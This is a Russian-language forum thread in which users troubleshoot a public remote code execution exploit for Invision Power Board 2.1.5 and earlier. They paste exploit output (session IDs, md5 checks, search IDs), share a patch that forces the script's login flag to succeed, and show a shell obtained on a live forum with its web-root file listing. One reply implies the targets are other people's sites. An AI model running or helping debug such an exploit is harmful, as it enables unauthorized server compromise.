Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1 2 3 След.
RSS
Invision Power Board <= 2.1.5 (lastdate) Remote Code Execution Exploit
 
Обсуждение статьи Invision Power Board <= 2.1.5 (lastdate) Remote Code Execution Exploit
 
експлоит писал фанат "бандитского петербурга" судя по имени переменной "eharniy_ekibastos" :)
 
Invision Power Board 2.* commands execution exploit by RST/GHC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~­~~~~
[~] SERVER : 192.168.......
[~] PATH : /
[~] LOGIN : qwerty
[~] PASSWORD : 111
[~] TARGET : 1 - IPB 2.1.*
[~] Login ... [ FAILED ]

у кого пашет?
 
[~] Login ... [ FAILED ]
 
пашет на 2.1.3
 
в строке 44 $loggedin = 0; сменил на 1. результат:
Invision Power Board 2.* commands execution exploit by RST/GHC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~­~~~~
[~] SERVER : 192.168......
[~] PATH : /
[~] LOGIN : qwerty
[~] PASSWORD : 111
[~] TARGET : 1 - IPB 2.1.*
[~] Login ... [ DONE ]
[+] SID:
[~] Try get md5_check ... [ FAILED ]
че дальше делать?
 
сплойт не тестил, но если ручками запостить ядовитый пост, то всё работает
 
У меня ручками запостили на 2.1.5.
Не сработало.
 
логин файэлд я обошел.
Но вот дальше, когда ищет мессагу, какой-то косяк.
 
сделал
в строке 44 $loggedin = 0; сменил на 1. результат:
Invision Power Board 2.* commands execution exploit by RST/GHC


Получаю...

[~] TARGET : 0 - IPB 2.0.*
[~] Login ... [ DONE ]
[+] SID: edde9b9157e873ff305ad8d170947835
[~] Try get md5_check ... [ DONE ]
[+] MD5_CHECK : 390e9432510bdd54ceab2a255afd9621
[~] Create new message ... [ DONE ]
[~] Search message ... [ DONE ]
[+] SEARCHID: d2f0829323cd84f122cc51742c8e0894
Command for execute or 'exit' for exit #

делаю show tables
получаю длинный html код....
и ничего хорошего
 
ааааа  *
он шелл дает
а я думал доступ к mysql

Command for execute or 'exit' for exit # ls
 admin.php
 ad.txt
 cache
 cgi-bin
 conf_global.php
 forumsitemap.xml
 google3635c827945927df.html
 gsitemap_install.php
 gsitemap_settings.xml
 i
 index.php
 indexsitemap.xml
 install
 ipb_templates.xml
 ipchat.php
 ips_kernel
 jscripts
 lang
 lofiversion
 modules
 PCconcurs_468x60.gif
 retail
 robots.txt
 rss
 skin_acp
 skin_cache
 sources
 style_avatars
 style_emoticons
 style_images
 topicsitemap.xml
 upgrade
 uploads
 
У меня получилось только echo('blabla');
и то, на выходе было blabla') а не blabla
Скорее всего поэтому system() не пашет.. :(
 
Нафиг было писать "Выполнение произвольного PHP кода", когда это доступ к шеллу? Час времени убил, пытаясь PHP выполнить.. :)
 
Цитата
Vicenzo пишет:

У меня получилось только echo('blabla');
и то, на выходе было blabla') а не blabla
Скорее всего поэтому system() не пашет.. :(
че за бред???
 
у меня SID не находит... подскажите че-нить, или выложите исправленный сплоит.
 
Всё, пашет. Просто я сначала пытался выполнить PHP код, перед тем как понял что это шелл на самом деле.
 
все, понял! надо не IP писать, а имя сервера!
 
[~] Login ... [ DONE ]
[+] SID: 3859b66a189710407921a711b8996da9
[~] Try get md5_check ... [ DONE ]
[+] MD5_CHECK : 4dec497f30d92183221a367bd15936e5
[~] Create new message ... [ DONE ]
[~] Search message ... [ DONE ]
[+] SEARCHID: 921994984b0102d978b2362d9ccf54d6
Command for execute or 'exit' for exit # dir
Command for execute or 'exit' for exit # ls -al
Command for execute or 'exit' for exit # ls
Command for execute or 'exit' for exit # dir
Command for execute or 'exit' for exit # cd..
Command for execute or 'exit' for exit # dir
Command for execute or 'exit' for exit #
че-то не пойму... команды не пашут!
 
у меня та же фигня, что и у Гость, 27.04.2006 13:44:49

Ответ от сервака:
---------------
HTTP/1.1 406 Not Acceptable
 Date: Thu, 27 Apr 2006 09:47:58 GMT
 Server: Apache/1.3.34 (Unix) mod_gzip/1.3.26.1a mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.1 FrontPage/5.0.2.2635 mod_ssl/2.8.25 OpenSSL/0.9.7a
 Connection: close
 Transfer-Encoding: chunked
 Content-Type: text/html; charset=iso-8859-1

 14c
 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
 <HTML><HEAD>
 <TITLE>406 Not Acceptable</TITLE>
 </HEAD><BODY>
 <H1>Not Acceptable</H1>
 An appropriate representation of the requested resource /index.php could not be found on this server.<P>
 <HR>
 <ADDRESS>Apache/1.3.34 Server at bla-bla.ru Port 80</ADDRESS>
 </BODY></HTML>

 0
-----

Убить себя не предлагать. Лучше сказать где я не прав.
 
Цитата
у меня та же фигня, что и у Гость, 27.04.2006 13:44:49

Ответ от сервака:

это правильный ответ от сервака за которым следит нормальный админ, скажи спасибо админу что он тебя еще не зафаерволил
Страницы: 1 2 3 След.
Читают тему